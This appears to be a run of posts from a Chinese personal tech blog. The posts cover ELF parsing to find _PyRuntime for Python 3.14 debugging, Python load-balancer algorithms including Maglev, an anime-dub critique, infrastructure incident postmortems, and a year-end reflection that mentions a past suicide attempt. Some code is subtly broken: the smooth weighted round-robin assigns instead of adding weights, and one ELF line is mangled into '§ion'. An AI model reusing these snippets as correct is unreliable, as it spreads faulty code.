Elf_Shdr* section = NULL;
for (int i = 0; i < elf_header->e_shnum; i++) {
    char* this_sec_name = shstrtab + section_header_table[i].sh_name;
    // Move 1 character to account for the leading "."
    this_sec_name += 1;
    if (strcmp(secname, this_sec_name) == 0) {
        section = §ion_header_table[i];
        break;
    }
}

获取section字符串表（包含所有section名称的表），通过e_shstrndx索引定位。同时遍历所有section，查找匹配的section名称。注意需要跳过section名字的”.”前缀。

Elf_Phdr* program_header_table = (Elf_Phdr*)(file_memory + elf_header->e_phoff);
// Find the first PT_LOAD segment
Elf_Phdr* first_load_segment = NULL;
for (int i = 0; i < elf_header->e_phnum; i++) {
    if (program_header_table[i].p_type == PT_LOAD) {
        first_load_segment = &program_header_table[i];
        break;
    }
}

找到program header表，然后搜索第一个PT_LOAD类型的segment，它定义了程序加载时的基地址。

if (section != NULL && first_load_segment != NULL) {
    uintptr_t elf_load_addr = first_load_segment->p_vaddr
        - (first_load_segment->p_vaddr % first_load_segment->p_align);
    result = start_address + (uintptr_t)section->sh_addr - elf_load_addr;
}

如果找到了目标section和第一个LOAD segment，计算目标section的运行时地址：

计算ELF文件的加载基地址（考虑对齐）
目标地址 = 进程中映射的起始地址 + section的虚拟地址 - ELF加载基地址

经过这样一个流程，我们就能最终的获取到 _PyRuntime 中的地址，然后基于此做一些包括 PEP 768 在内很有趣的工作。

总结

Python 3.14 官方其实将进程信息以半正式化的形式形成了一组相对稳定的 ABI，这样可以使我们调试工具能以更好的方式对 Python 进程进行无侵入的调试与观测。PEP 768 其实是这个过程中一个的有效产物。而基于 PEP768 处理的比如 Remote PDB debug，目前也已合入分支。

可以说从 Python 3.14 起，Python 的调试工具和手段将得到极大的丰富与增强。建议大家在出来后的第一时间进行升级（

差不多就这样（

简单聊聊常见的负载均衡算法

2025-03-23T12:00:00.000Z

这篇文章鸽了很久，最终决定还是老老实实写完，来介绍一下常见的一些负载均衡算法实现。本文的代码最终都会放在 load-balancer-algorithm¹ 这个 repo 中

~~我从来没有觉得写博客快乐过~~

正文

先行准备

既然是讲 LoadBalancer 中常用的一些负载均衡算法，我们先来对一些前置准备做一些讨论

我们目前需要两个基础的数据结构

代表着 Backend 节点的结构
代表着请求上下文的结构

那么我们可以得出下面一些基础代码

import dataclasses


@dataclasses.dataclass
class Node:
    host: str = ""
    port: int = 0
    node_available: bool = True

    @property
    def available(self) -> bool:
        return self.node_available

import dataclasses


@dataclasses.dataclass
class RequestContext:
    pass

同时我们在没有后端节点可供选择的时候，我们需要抛出一个异常

1 2	class NoNodesAvailableError(ValueError): pass

好了，我们现在可以进行更进一步的抽象，我们可以将我们的负载均衡算法抽象为策略(Strategy), 那么我们可以得出如下的一些代码

from __future__ import annotations

import typing
from abc import ABC, abstractmethod

if typing.TYPE_CHECKING:
    from load_balancer_algorithm.context import RequestContext
    from load_balancer_algorithm.node import Node


class Strategy(ABC):
    nodes: list[Node] = []

    def __init__(self, nodes:list[Node]) -> None:
        self.nodes = nodes

    @abstractmethod
    def get_node(self, ctx: RequestContext) -> Node:
        pass

    def add_node(self, node: Node) -> None:
        self.nodes.append(node)

    def remove_node(self, node: Node) -> None:
        self.nodes= list(filter(lambda n: n != node, self.nodes))

好了，我们现在可以往下去实现一些负载均衡算法了

随机选择

负载均衡最简单的一个算法是做一个随机的选择，实现非常简单，最简单的伪代码实现差不多这样

1 2	a = [] random.choice(a)

我们来完整实现一下

class RandomStrategy(Strategy):
    def get_node(self, ctx: RequestContext) -> Node:
        nodes = list(filter(lambda node: node.available, self.nodes))
        if not nodes:
            raise NoNodesAvailableError

        return random.choice(nodes)

OK，现在我们增加一个需求，现在我们每个节点都需要有一个权重值，权重值越高的节点被选中的概率越高。我们可以使用 random.choices 来实现这个需求，不过在此之前我们需要对 Node 进行一些修改

import dataclasses


@dataclasses.dataclass
class Node:
    host: str = ""
    port: int = 0
    node_available: bool = True
    weight: int = 0

    @property
    def available(self) -> bool:
        return self.node_available

然后我们来实现一下 WeightedRandomStrategy


class WeightedRandomStrategy(Strategy):
    def get_node(self, ctx: RequestContext) -> Node:
        nodes = list(filter(lambda node: node.available, self.nodes))
        if not nodes:
            raise NoNodesAvailableError

        weights = [node.weight for node in nodes]
        return random.choices(nodes, weights=weights)[0]

Random 确实是我们非常常用的一套负载均衡算法，但是缺点也很明显，其负载均衡的效果有一定的不可预测性，是神是鬼全靠你使用的 Random 函数的质量。运气不好就会出现分布非常密集的情况。那么我们有没有可用的更好的负载均衡算法呢？

轮询算法

我们对于负载均衡算法常见的需求是在逻辑上有一定的可预测性，从这角度上讲，轮询算法是一个非常好的选择。我们可以使用一个 index 来记录当前的节点，然后每次请求的时候都将 index + 1，直到 index 超过节点的数量，然后 index = 0

class RoundRobinStrategy(Strategy):
    def __init__(self, nodes: list[Node]) -> None:
        super().__init__(nodes)
        self.index = 0

    def get_node(self, ctx: RequestContext) -> Node:
        nodes = list(filter(lambda node: node.available, self.nodes))
        if not nodes:
            raise NoNodesAvailableError

        node = nodes[self.index]
        self.index += 1
        if self.index >= len(nodes):
            self.index = 0

        return node

这里我们实现了一个最基础的轮询算法（我们假设不存在节点不可用，节点增删改的情况），所以我们 index 一直可以有规律的变化

这里的结果很明显，如果有一个 [A, B] 的节点列表，那么我们会得到一个 [A, B, A, B, A, B] 的结果

那么现在我们更改一下需求，我们需要实现一个类似 WeightedRandomStrategy 的轮询算法，权重越高的节点被选中的概率越高。

class WeightedRoundRobinStrategy(Strategy):
    def __init__(self, nodes: list[Node]) -> None:
        super().__init__(nodes)
        self.index = 0
    
    def get_node(self, ctx: RequestContext) -> Node:
        nodes = list(filter(lambda node: node.available, self.nodes))
    
        if not nodes:
            raise NoNodesAvailableError
        nodes=[node for node in nodes for _ in range(node.weight)]
        node = nodes[self.index]
        self.index += 1
        if self.index >= len(nodes):
            self.index = 0
        return node

这里的核心算法很简单，我们基于每个节点的权重，得到一个扩展后的节点列表，然后我们就可以使用最基础的轮询算法来实现了

但是这里核心的一个弊端很明显，假设我们有 [A(weight=2),B(weight=1)] 这样一个节点组合，我们会得到 [A, A, B] 这样一个选择结果，这里的节点分布会非常不均匀。那么怎么办呢？我们可以参考一种来自 Nginx 的平滑算法²

我们首先给节点加上一个 current_weight 的熟悉，记录当前节点的权重值

import dataclasses


@dataclasses.dataclass
class Node:
    host: str = ""
    port: int = 0
    node_available: bool = True
    weight = 0
    current_weight: int = 0

    @property
    def available(self) -> bool:
        return self.node_available

    def __post_init__(self):
        self.current_weight = self.weight

然后我们来实现一下 WeightedRoundRobinStrategy

class WeightedRoundRobinStrategy(RoundRobinStrategy):
    def get_node(self, ctx: RequestContext) -> Node:
        nodes = list(filter(lambda node: node.available, self.nodes))
        if not nodes:
            raise NoNodesAvailableError
        best_node = None
        total = 0
        for node in nodes:
            total += node.weight
            node.current_weight = node.weight
            if not best_node or node.current_weight > best_node.current_weight:
                best_node = node
        if not best_node:
            raise NoNodesAvailableError
        best_node.current_weight -= total
        return best_node

这里新增的 current_weight 的作用很简单，

每次选取节点时，遍历可用节点，遍历时把当前节点的 current_weight 的值加上它的 weight
同时累加所有节点的 weight 值为 total 。
如果当前节点的 current_weight 值最大，那么这个节点就是被选中的节点，同时把它的 current_weight 减去 total
没有被选中的节点的 current_weight 不用减少。

这本质上其实很巧妙的将节点打散，同时将 index 的属性利用 current_weight 来处理，经过处理，我们假设有 [A(weight=3),B(weight=2),C(weight=1)] 这样一个节点组合，我们会得到 [A, B, A, C, B, A] 这样一个选择结果，这里的节点分布会相对均匀很多

OK，现在我们轮询函数实现完成了，我们能发现，Random 和轮询算法本质上是两种无状态的算法（最原始的 RoundRobin 有状态，但是我们通过 current_weight 的方式将其变成了无状态），但是我们通常在业务上会有一些根据状态来选择节点的需求，常见的场景有

我们需要请求去往目前负载最低的节点
某一类请求我们需要去往同一个节点

因此下面我们会来介绍两种算法

最小链接/加权最小链接
一致性 Hash 算法

最小链接算法

最小链接算法是一个非常简单的算法，我们需要在每次请求的时候，遍历所有的节点，找到当前连接数最少的节点，然后将请求转发到这个节点上。我们可以使用一个连接数的属性来记录当前节点的连接数

class LeastConnectionStrategy(Strategy):
    def get_node(self, ctx: RequestContext) -> Node:
        best = None
        for node in self.nodes:
            if not node.available:
                continue
            if not best or node.connections < best.connections:
                best = node
        if not best:
            raise NoNodesAvailableError
        best.connections += 1
        return best

OK，那么我们接下来老规矩需要考虑加权的 LeastConnection 算法，这里稍晚有一点绕

假设用 C 表示连接数、W 表示权重、S 表示被选中的节点、Sn 表示未被选中的节点
那么 S 必须满足 C(S) / W(S) < C(Sn) / W(Sn) ，这个条件也可以表示为 C(S) x W(Sn) < C(Sn) x W(S)

那么我们来实现一下

class WeightedLeastConnectionStrategy(LeastConnectionStrategy):
    def get_node(self, ctx: RequestContext) -> Node:
        best = None
        for node in self.nodes:
            if not node.available:
                continue
            if not best or (node.connections / node.weight) < (best.connections / best.weight):
                best = node
        if not best:
            raise NoNodesAvailableError
        best.connections += 1
        return best

当然我们这里实际上有一点问题是，这里的选择可能会连续选择到同一个节点上（因为权重的不均匀），这里可以考虑把符合条件的节点放到一个列表中，然后使用我们前面提到过的 RoundRobin/Random 来选择一个节点来进行请求转发

这里我就不实现了，大家可以自己实现一下

一致性 Hash 算法

我们在业务中经常有这样一种需求，我们需要将同一类请求转发到同一个节点上，这个时候我们就需要使用一致性 Hash 算法来实现了

最基础的一致性 Hash 算法是将请求的 key 和节点的 key 进行 hash 计算，然后将请求转发到 hash 值最接近的节点上。我们可以使用一个 ring 来表示所有的节点，然后在 ring 上找到离请求最近的节点。

但是这样存在比较大的问题是，如果有节点的增删改，这个时候我们已经分配好的逻辑会存在 rebalance 的问题。所以我们需要将这个变动变得最小。

目前主流的几种一致性 Hash 算法的核心思路都是通过虚拟节点来解决这个问题。我们可以将每个节点映射到多个虚拟节点上，然后在 ring 上找到离请求最近的虚拟节点，然后将请求转发到对应的真实节点上。

这样我们就可以将节点的增删改对请求的影响降到最低。

我们将以 Google 的 Maglev 算法为基础来实现一致性 Hash 算法

首先我们更改一下 Node 的代码

import dataclasses


@dataclasses.dataclass
class Node:
    host: str = ""
    port: int = 0
    node_available: bool = True
    weight: int = 0
    current_weight: int = 0
    connections: int = 0

    @property
    def available(self) -> bool:
        return self.node_available

    def __str__(self) -> str:
        return f"{self.host}:{self.port}"

这里我们可以用 str(node) 来获取 nodekey

然后我们来介绍一下 Maglev 算法的核心思路（这里只介绍最简化版本的细节，详情可以参考 Maglev: A Fast and Reliable Software Network Load Balancer³）这篇论文

首先，我们要确定经过预处理后的产物 lookup table 的长度 M。所有 Key 都会被 hash 到这个 lookup table 中去，而 lookup table 中的每个元素都会被映射到一个 Node 上

而计算 lookup table 的计算分为两步

计算每一个 node 对于每一个 lookup table 项的一个取值（也就是原文中提到的 permutation）；
根据这个值，去计算每一个 lookup table 项所映射到的 node（放在 entry 中，此处 entry 用原文的话来讲就是叫做 the final lookup table）。

permutation 是一个 NM 的矩阵，列对应 *lookup table，行对应 node。为了计算 permutation，需要挑选两个 hash 算法，分别计算两个值 offset 与 skip 。最后根据 offset 和 skip 的值来填充 permutation，计算方式描述如下：

offset = hash1(name[i]) mod M
skip = hash2(name[i]) mod (M − 1)+ 1
permutation[i][j] = (offset+ j × skip) mod M

其中 hash1 和 hash2 是两个不同的 hash 函数，我们后续会使用 xxhash 和 mmh3 这两种 hash 函数来实现

然后我们可以给出 lookup table 的计算方式

def calculate_lookup_table(n: int, m: int, permutation: list[list[int]]) -> list[int]:
    # result 是最终记录分布的 Hash 表
    result: list[int] = [-1] * m
    # next 是用来解决冲突的，在遍历过程中突然想要填入的 entry 表已经被占用，
    # 则通过 next 找到下一行。一直进行该过程直到找到一个空位。
    # 因为每一列都包含有 0~M-1 的每一个值，所以最终肯定能遍历完每一行。
    # 计算复杂度为 O(M logM) ~ O(M^2)
    next: list[int] = [0] * n
    flag = 0
    while True:
        for i in range(n):
            x = permutation[i][next[i]]
            while True:
                # 找到空位，退出查找
                if result[x] == -1:
                    break
                next[i] += 1
                x = permutation[i][next[i]]
            result[x] = i
            next[i] += 1
            flag += 1
            # 表已经填满，退出计算
            if flag == m:
                return result

在这里我们能看到，这段循环代码必然结束，而最坏情况下，复杂度会非常高，最坏的情况可能会到 O(M^2)。原文中建议找一个远大于 N 的 M （To avoid this happening we always choose M such that M ≫ N.）可以使平均复杂度维持在 O(MlogM)

我们可以用论文中的图来评估下如果节点存在移除的情况，整体的 rebalance 的效果

我们现在来完整实现一下 Maglev 算法，我们先确定用请求中的 url 来作为 hash key，所以我们需要对 RequestContext 进行一些修改

import dataclasses


@dataclasses.dataclass
class RequestContext:
    url: str = ""

好了，来把剩下的部分实现了

M = 65537


class MaglevStrategy(Strategy):
    @staticmethod
    def calculate_lookup_table(n: int, m: int, permutations: list[list[int]]) -> list[int]:
        # result 是最终记录分布的 Hash 表
        result: list[int] = [-1] * m
        # next 是用来解决冲突的，在遍历过程中突然想要填入的 entry 表已经被占用，
        # 则通过 next 找到下一行。一直进行该过程直到找到一个空位。
        # 因为每一列都包含有 0~M-1 的每一个值，所以最终肯定能遍历完每一行。
        # 计算复杂度为 O(M logM) ~ O(M^2)
        next: list[int] = [0] * n
        flag = 0
        while True:
            for i in range(n):
                x = permutations[i][next[i]]
                while True:
                    # 找到空位，退出查找
                    if result[x] == -1:
                        break
                    next[i] += 1
                    x = permutations[i][next[i]]
                result[x] = i
                next[i] += 1
                flag += 1
                # 表已经填满，退出计算
                if flag == m:
                    return result

    def __init__(self, nodes: list[Node]) -> None:
        super().__init__(nodes)
        permutations = []
        for i in range(len(nodes)):
            permutation = [0] * M
            offset = mmh3.hash(str(nodes[i])) % M
            skip = (xxhash.xxh32(str(nodes[i])).intdigest() % (M - 1)) + 1
            for j in range(M):
                permutation[j] = (offset + j * skip) % M
            permutations.append(permutation)
        self.tables = self.calculate_lookup_table(len(nodes), M, permutations)

    def get_node(self, ctx: RequestContext) -> Node:
        hash_value = mmh3.hash(str(ctx))
        index = hash_value % M
        node_index = self.tables[index]
        return self.nodes[node_index]

如果大家对 Google 整个 Maglev 系统感兴趣，可以去参考一篇我之前写博客，简单聊聊 Maglev ，来自 Google 的软负载均衡实践⁴

总结

好了，这次负载均衡算法告一段落，其实工作中还有一些更组合的场景，比如 sharding 轮询之类的，不过整体思路都不会发生太大变化。希望大家看的开心

Reference

https://github.com/Zheaoli/load-balancer-algorithm

https://github.com/nginx/nginx/commit/52327e0627f49dbda1e8db695e63a4b0af4448b1

https://research.google/pubs/maglev-a-fast-and-reliable-software-network-load-balancer/

https://www.manjusaka.blog/posts/2020/05/22/a-simple-introduction-about-maglev

简单吐槽一下摇曳露营的台配

2025-02-03T18:00:00.000Z

看了一下台配摇曳露营的 PV 放松，有些地方很想吐槽，写个短文聊一下

正文

先放出两版本对比

下面是原版

下面是台配

现在我们来聊一聊我觉得这个配音出现了什么样的问题

首先这是出自摇曳露营 S1E1 的最开始的部分。实际上是一个倒序的模式，将五人组的富士山露营在最开始进行展现，然后在季末进行收尾。

这个做法的效果和意图都很明确，其核心在于

让声优用声音将角色本身的性格立住

在这里面我认为问题最大的两个人，

大垣千明
齐藤惠那

其实犬山葵的问题也挺大的，但是出于方言角色确实不太好把握，这里就不多说了。

这两个角色的其实问题都很一致，配音者对于角色的性格把握不准。大垣千明是一个很干脆利落的角色，在四人组中是一个类似数码宝贝中太一一样 Leader 的角色，喜欢开玩笑，有一点假小子的感觉。而齐藤惠那性格和大垣千明有一些类似，不过齐藤会有更多一些少女味，所以她也成为四人组与凛之间的融合剂。

在原配中，大垣千明全程以很干脆利落的声线立住了人设。而齐藤惠那主要的两句台词“犬山同学，这样可以吗？”和“欸？真的吗？”声优很巧妙的换了不同的发声方式，让角色瞬间立体了起来。

在台配中，两者的声质都显得非常黏，或者用更不客气的观感来说，五个人的声质完全很难立住人设，属于是教科书里应该出现的声音，而不是动画里应该出现的声音。

而且台配还有一个比较明显的问题，声优对于情绪的把握出现了问题，比如还是经典的齐藤惠那的“欸？真的吗？”（背景是犬山提醒烤棉花糖不要离火太近，否则会烤焦）这句台词，原配中是一个带着学到新东西的惊讶的语气，而在台配中却在声音中显出了一些焦急。我觉得这是合格的声优不应该出现的意料外的问题。

另外一点其实被很多人忽略了，日语和中文的发音节奏和习惯是不一样的。在引入过程中，台词可能需要做一些适当的调整。比如在原配中，大垣千明的“欸！来芝麻凛的可可”(ほいしまりんココア一丁) ，这里 “一丁” 是日语中一个很口语的用法，声优选择在这里加了一个重音，来体现一个服务生的感觉，从而表现出大垣千明的古灵精怪。而在台配中，直接处理为“来，志摩凛的可可”，这里就没有很好的本土化。如果是我的话，我可能会选择更符合中文语境的 “来，志摩凛，你可可来咯！”这种口语化表达

这点在曾经上海电影译制厂译制的各种作品中体现的非常不错。我举个例子，在爱迪奥特曼第44话，激ファイト！ 80vsウルトラセブン/激斗，爱迪对战奥特赛文。中，不良暴走族在被假冒赛文狂追的时候，说“まだついてきやがるチクショウ”，直译为“该死，他还在跟着我。”，上译的老前辈们处理为“赛文还在追我，TMD”。而且用了非常痞子的声线，我觉得这就是展现了一个非常好的本土化的正面例子

放一个片段大家感受下

总结

差不多就吐槽这么多吧，翻译是一个累活苦活，希望大家也能多包容。希望不同地方的译者也能给我们带来不同的文化碰撞带来的惊喜。

差不多这样，祝大家新年快乐

Saka 馬鹿

2025-01-04T18:30:00.000Z

这篇博客是我在刷题群内的 2025 年的第一次分享整理的演讲稿。主要是完整复盘了过去几年里我犯下的两个比较典型的低级错误。

希望大家能看的开心

正文

首先来看一下我们抽象后的架构

很平平常规的一个架构。而我犯的两次相对低级的错误分别是在数据的入口和数据落点上。OK 那么我们分别来看一下我犯下的错误

首先要分享的是我搞出的一个核心数据库删除的事故。在介绍事故现场之前，我将先介绍下下当时我们整体资源管理的结构

我们基于 Terraform 管理资源
熟悉 Terraform 的同学都知道，Terraform 很重要的一点就是需要一个介质来存储当前 infra 的 state，这样能让后续的操作基于状态来实现 diff
我们当时的 state 是存储在 local fs ，state 文件跟随着 Git Repo 一起变更
我们基于目录划分不同业务需要的 AWS Infra 所对应的 Terraform 描述
关键设施没有开启删除保护

OK，我们继续往前讲，我们来激活一下事故现场的回忆

事故当天，需要给一个新的业务需要一个 AWS Aurora 实例
我直接复制了一个目录，然后重命名为新业务名
删除一些不必要的 TF 声明后，我就直接开始 terraform apply 了
因为将之前的 TF State 文件迁移到了新目录，同时修改了 TF 声明。Terraform 会判定需要删除以往的资源。在 apply 阶段的 destory 提示被我忽略
于是数据库没了.jpg

让我们先快进到事故的处理

在接到报警发现异常后，先第一时间中断 Terraform 执行并同步所有关联同事。
将所有关联服务流量 cutoff 并同步客服团队
基于已有快照重建数据库
大约事发1.5h后，恢复业务流量

非常刺激的一次经历。反思的部分我们放在后面。我们快进到第二次事故。CDN 变更事故。还是和之前一样先介绍一下大致的背景

我们的 CDN 因为处于成本，和架构统一的考虑，使用的是 AWS 的 Cloudflare
CDN 前面套了一层基础的 WAF 来处理一些恶意流量
会有一些业务脚本调用 AWS API 来触发 CDN 的 invalid 操作
我们当时在处理反爬虫的一些事情，需要额外更新一些 WAF Rule

那么梅开二度，让我们继续激活一下事故现场的回忆

给 WAF 直接上了官方推荐的 Anti Bot Rule
因为当时 WAF Rule 不支持灰度功能，所以没有做灰度
由于 AWS Anti Bot rule 会将 Android/iOS 的 UA 识别为 Bot，导致客户端流量跌0

继续快进到事故现场的处理

立刻进入熔断流程，切断相关流量并同步客服团队
由于业务调用 AWS 触发了 AWS 账号的 rate limit，所以无法第一时间解除对应的 WAF 规则
先停止业务脚本调用
大约在事发40min后，AWS rate limit 解除，我们将 WAF 规则回滚到之前的版本，恢复业务流量

痛苦的回忆先告一段落。我们来复盘一下我们这两个事故中的共性问题。首先务虚的说核心还是对生产抱有侥幸。那么从技术上来说存在哪些问题呢？

核心基础设施保护设置不到位
核心基础设施变更 Review 缺乏
缺少关键变更的灰度机制
对于业务方使用基础设施的手段缺乏监控和治理（在事故2中，如果不存在 rate limit 的时间，那么整个故障时间可以缩短在 10 min 以内）

所以围绕这样几个点，在事故发生后的一段时间内我在逐步推进一些改进

我们统一将 terraform state 从 local fs + git 的组合中解放出来，迁移到了 S3 存储，这样为后续 Terraform workflow 改造打下基础
我们引入 Atlantis 来管理 Terraform 的 PR Review。对于核心基础设施的变更需要 double review
巡检其余 Redis/MySQL/Kafka 等基础设施，统一开启删除保护/二次验证
对于 CDN 这类变更引入如下流程（实际上分为 AWS 支持灰度前后）
1. 支持灰度前
  1. 我们会从我们自建的网关中提取出一部分镜像 Query 流量
  2. 新建一个 CDN 实例
  3. 将新规则完整应用在新实例上后，进行流量重放，验证规则的有效性
2. 大约在2023年中后，AWS 对于 WAF 之类的规则新增了灰度的一些支持
  1. 我们会在 AWS WAF 中新建一个规则，action 仅为统计
  2. 在确认规则不会存在误伤后，我们会将 action 修改为目标需求
我们在事后统一盘点了业务侧对于基础设施 API 的一些使用情况，将相关问题统一治理

实际上在事故1和2中，我自己还有一些其余的建议给看到这篇文章的同学

在事故发生后，如果预计恢复时间比较长，请第一时间将服务降级/切断入口流量。避免在恢复阶段流量不断进来同时存在缓存雪崩等情况下连锁反应导致恢复时间急剧增加
对于数据库等数据关键数据落地点，一定要存在下面这样一些 action
1. 备份一定需要做
  1. 基于业务的重要性以及备份成本选择备份周期
  2. PITR 增量和全量备份都需要做
2. 一定需要定时对备份进行重建测试，目的主要有以下一些
  1. 验证备份的有效性（对于使用云厂商的数据库备份可靠性相对还好，自研工具做 fs snapshot 的需要特别注意）
  2. 验证不同规模下数据恢复的时间，在事故发生后对于恢复周期有个预期（在事故1中，因为我们之前没做过类似的演练，所以完全没法给出个时间点）（这里我们得到的一个参考时间经验公式是 9分钟/GB 的恢复时间）

总结

差不多就这样，希望大家能从我的分享中得到一些启发。最后，希望大家在新的一年里都能够顺利，事事顺心。

本当の僕らをありがとう

2024-12-31T15:00:00.000Z

每年都会选择一句话来总结自己这一年，前年是“但行好事，莫问前程”，去年是 “Per aspera, Ad astra”。那么今年我选择是 “本当の僕らをありがとう”。

这句出自《Angel Beats!》的片尾曲《My Song》。含义为“向最真实的我们致谢”

开篇

今年其实某种意义上是去年的延续，去年年中的我尝试从18楼一跃而下。而双相以及自己的不自信以及在职业上的焦虑让躯体化的症状持续到了今年。某种意义上来说今年是混沌的一年。

不过今年也是挺值得思考的一年，可能今年所积累的东西可能会在未来以某种特殊的形式回馈回来。

生活

双相的治疗进入了深水区，今年状态一直起伏不定，药物性肝损伤，双相波动带来的躯体化症状如影随行。今年虽然没有如同去年一样试图从18楼上来一次刺客信条。但是对我来说，艰险程度还超过去年。

一如既往的噩梦，各种生活里的反复一如既往的围绕着我。在调整治疗方案后，虽然情绪有所改善，但是所带来的副作用又成为新的问题。

不过日子还得过，生活也还得继续。爱和希望也还围绕着我。

你们可能还记得去年家里新增了一只名为小熊的猫。出身流浪，最让人担心。今年病危三次，挺过来三次，指标在年底进入稳定状态。主治医生评价“这命真硬啊”。某种意义上小熊算是成今年家里生命力的模板。

的今年对于我来说，另外一个最大的变化是买了一直心心念的相机，Z8 + 尼康 2.8 大三元，然后 11月份买了 Z9。看了下快门数差不多接近4w了，带着狗子出门拍照。也自己出去拍了好看的荷花。在经常遛狗的小公园帮很多家庭留下了美好的瞬间。某种意义上来说在按下快门以及和很多人分享照片的时候，是我今年这一年难得心灵上能放松的时候。Hhhhhh

剩下的就是一些碎碎念了，今年看了不少好看的番剧，86不存在的战区，青之箱，Angel Beat，胆大党 etc…. 某种意义上这些番剧成为我精神的一处安心之所。可能这就是二次元的意义吧.jpg

感情

感情进入了第六个年头，相伴真的是一件既幸福，又考验人的事

如果说去年荆澈同学将我从18楼飞出的瞬间抓了回来让这份感情添加了不少生死交错的厚重感。那么今年则是在这份厚重感上尝试去淡化生死的伤痕。

今年由于我状态波动非常大，荆澈同学相较于去年承担了更多宠物和生活上的琐事。比如带着猫咪周期性复查等等。

说实话陪伴一个心理病人稳定的走下去真的是一件非常辛苦的事。首当其冲的挑战是承受伴侣的情绪真的是很有挑战的一件事。所以希望在25年，我的情绪能更加的受控，让荆澈同学能有更多精力去做她所想做的事情

以及 25 年一定要和荆澈同学出去玩！

技术

如果说去年是“改革，啊不，学习进入了深水区”，那么今年我觉得可以是“学习进入了马里亚纳海沟”

今年我要要面临的更具有挑战性的事是我对于自身的怀疑。“我是否适合做技术？我是否能成为一个优秀的工程师？我是否能继续在这条路上稳定的走下去？”这成为我从业八年以来第一次对自己产生了自我的怀疑。

在这种怀疑之下，导致我很多时候会在焦虑驱动下去做一些事情。这样的结果无疑会很坏。我今年一直在尝试与自己和解。尝试去更无功利心，更无目标性的去放松的学习一些东西。这种做法有利有弊，有利的地方是我在一些间接性的兴趣驱使下，机缘巧合下扩展了自己的技术宽度（做一些 AI 以及前端的东西），但是也暴露出了我固有的一些缺点

在8年的职业生涯过去后，我似乎进入了一种思维的舒适区。我会依赖自己相对较强的快速学习和 landing 的能力去啃下不少东西。但是这也会导致我在不少问题的思考深度上有很明显的不足。我在过去这一年通过一些方式在调整自己的这样一些习惯。但是这一点在25年我也更希望能有所改进

不过往好处看，24年算是我积累的一年，这一年我在帮社区修了不少 Bug 之余，在 CPU 指令集/汇编/体系结构/编译原理等基础技能上也有了不小的提升。虽然短期内这些东西不太可能会有很高的收益。但是我感觉未来某一天这些东西会以某种形式回馈回来。

最后用一张图来总结下我的 2024 吧

总结

2024 虽然相较于之前有所摸鱼，不过也算是我自己必须要经历的一个过度年份吧。展望2025，最核心的目标还是和自己和解，希望能在年底的时候能对自己说“saka 你是个不错的人”

如果要说一些具体的小目标的话，那么我希望

和荆澈同学出远门旅游一次
新进入一个 Top 项目的 Org，成为 member/maintainer
继续保持每天刷题的节奏
尽可能保证每两周一篇博客（技术/生活/随笔）
能够去在完成一到两个前端应用（在 AI 辅助下）并在刷题群内分享
重新恢复刷题群的公益活动（刷题捐款，跑步捐款，以及公开分享（作为起始，这周五我先在刷题群内自己公开复盘一下自己过去几年犯过的低级的技术错误以及后续改进的 action （自我鞭尸（
自己能基于 Dify 等 AI Agent 框架做一些好玩的应用（自己目前有一些 idea Hhhh
保持每周一次的摄影活动

差不多就这样吧。

感谢大家 2024 的陪伴，saka 永远爱着你们（

OpenDAL 0.51 版本代号 “本当の僕らをありがとう。” 背后的故事

2024-12-14T18:30:00.000Z

Apache OpenDAL v0.51.0 第一个 RC 版本发布了，这个大版本有些特殊，是我第三个负责 Release 的版本，也是第一个带有 Subtitle 的版本

这个版本的副标题为 “本当の僕らをありがとう” ，意为 “向真实的我们致谢”

聊聊这个版本背后的一些故事吧

正文

在筹备 v0.51.0 的发版的时候，我本来是想想一个标题，来庆祝摇曳露营 S4 制作确定的。所以在 @xuanwo 和 @frostming 的支持和建议下。我发起了一个提案 [VOTE] Proposal: Adding Cultural References to Release Titles¹

提案 #5303 通过后，我本来想用志摩凛的一句我很喜欢的台词“ソロキャンは寂しさも楽しむものなんだって”来作为摇曳露营 S4 制作决定的庆祝。但是不知道怎么回事，我耳边突然想起了《My Song》这首歌

苛立ちをどこにぶつけるか，【焦躁地在哪里寻找的时候】，
探してる间に终わる日，【一天已经结束了】，
空は灰色をして，【天空一片灰暗】，
その先は何も见えない，【前方什么都看不见】，
常识ぶってる奴が笑ってる，【故作明了的家伙在笑】，
次はどんな嘘を言う？【接着又会说出怎样的谎言？】，
それで得られたもの，【由此所得之物】，
大事に饰っておけるの？【又怎会好好珍重呢？】，
でも明日へと进まなきゃならない，【但是我们必须向着明天前进】，
だからこう歌うよ，【因此放声高歌】，
泣いてる君こそ孤独な君こそ，【哭泣的你孤独的你反而】，
正しいよ人间らしいよ，【是更合理的更有人情味的】，
落とした涙がこう言うよ，【落下的泪水仿佛在说】，
こんなにも美しい嘘じゃない，【如此美丽毫不虚假的】，
本当の僕らをありがとう，【向真实的我们致谢啊】，
叶えたい梦や，【希望能够实现的梦想】，
届かない梦がある事，【及遥不可及的梦想】，
それ自体が梦になり希望になり，【其本身就是一种梦想化作了希望】，
人は生きてゆけるんだろ，【人才能活下去吧】，
扉はあるそこで待っている，【有一扇门在那里一直等待着】，
だから手を伸ばすよ，【所以伸出双手吧】，
挫けた君にはもう一度戦える，【为了让受挫折的你能再度奋战】，
强さと自信とこの歌を，【送上这首坚强的自信的歌】，
落とした涙がこう言うよ，【落下的泪水仿佛在说】，
こんなにも汚れて丑い世界で，【向在如此肮脏丑陋的世界中】，
出会えた奇迹にありがとう，【相遇的奇迹致谢吧】。

先附上歌的链接

国内读者²
国外读者³

可能熟悉二次元的同学已经反应过来了，这是来自于《Angel Beats!》第三话的插曲《My Song》的歌词。在现实生活中，由歌手中村真里奈演唱。收藏在专辑《Crow Song》中

Angel Beats! 是一部由 Key 制作的动画，讲述了一群都有着生前特殊的遗憾的人们聚集在一个名为“死后世界”的地方，通过与“天使”对抗，寻找自己的遗憾，最终解决自己的遗憾，从而得以超度的故事。而《My Song》的剧中主唱，岩泽雅美（岩沢まさみ）便是其中的一员。

Angel Beat 每个人的故事都很特殊，男主音无结弦，从小和重病的妹妹相依为命，为了治愈更多的人而立志投生于医学。但是在前往医学院的考场路上遇上土石塌方。在黑暗中音无利用自己的医学知识帮助其余人使其活到了救援到来的时候。而在救援队挖开落石的那一刻因为伤势过重而死亡。在死前选择将器官全部捐献出去。

